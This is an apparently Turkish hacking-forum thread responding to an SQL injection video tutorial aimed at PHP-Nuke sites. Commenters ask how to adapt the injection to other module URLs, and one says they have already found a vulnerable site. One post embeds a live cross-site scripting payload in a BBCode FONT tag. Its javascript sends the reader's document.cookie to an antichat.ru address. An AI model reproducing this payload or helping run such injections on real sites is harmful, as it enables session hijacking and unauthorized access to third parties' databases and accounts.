İleri düzeyde sql injection (Şiddetle öneririm) Php-nuke.org'de denenmiş...

kardeş süper allah razı olsun. ama bişi soracam video sırasında demişsinki kategori göstermedi Ben bi siteye denedim kategordi leri gösteriyor bunda ne yapmalıyım sölermisin ltfn. Tşkrler tekrar sölüyom süper olmus

saol dostum güzle iş

Teşekkür ederim. manyakman onları görmek senin işine daha çok yarar o video'daki örnek'le yola çık aynı mantık ile fakat colom sayılarını o modules'in içeriğine göre vermen lazım sende video'daki gibi colom'ları dene kolay gelsin.

kardeş denedim bi site üstünde ama olmadı acık kapanmış anlamına geliyor sanırım ama benim sormak istedigim bir iki soru daha var [email protected] ltfn yardım et ya:(

Baba çok saOl ya ben bi tane buldum bile ;)

Harika anlatmışsın.Bide hata yapıp sonra düzeltmen çok güzel.Çünkü bizde aynı hatayı yaptııımızda düzeltiriz...Devamını bekliyoruz :D

Bide sitenin yananı yazdığın şeyleri hepsini yazabilirmisin ? Çünkü sonunu anlayamadım...

Hatayı bilerek yapmadım, birazda sinirlenip geç buldum. Msn : [email protected]
Sorularınızı bu başlık altında veya msn'den sorabilirsiniz. Ben teşekkür ederim.

[FONT=Arial Size=1 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?;+document.cookie);/][/FONT]

sağol varol

bir sorum olucak tı peki biz download dan degilde content den sql yapmıs olsaydık

...Content&d_op=viewscontent diyemi yazıcaktık ?

Geri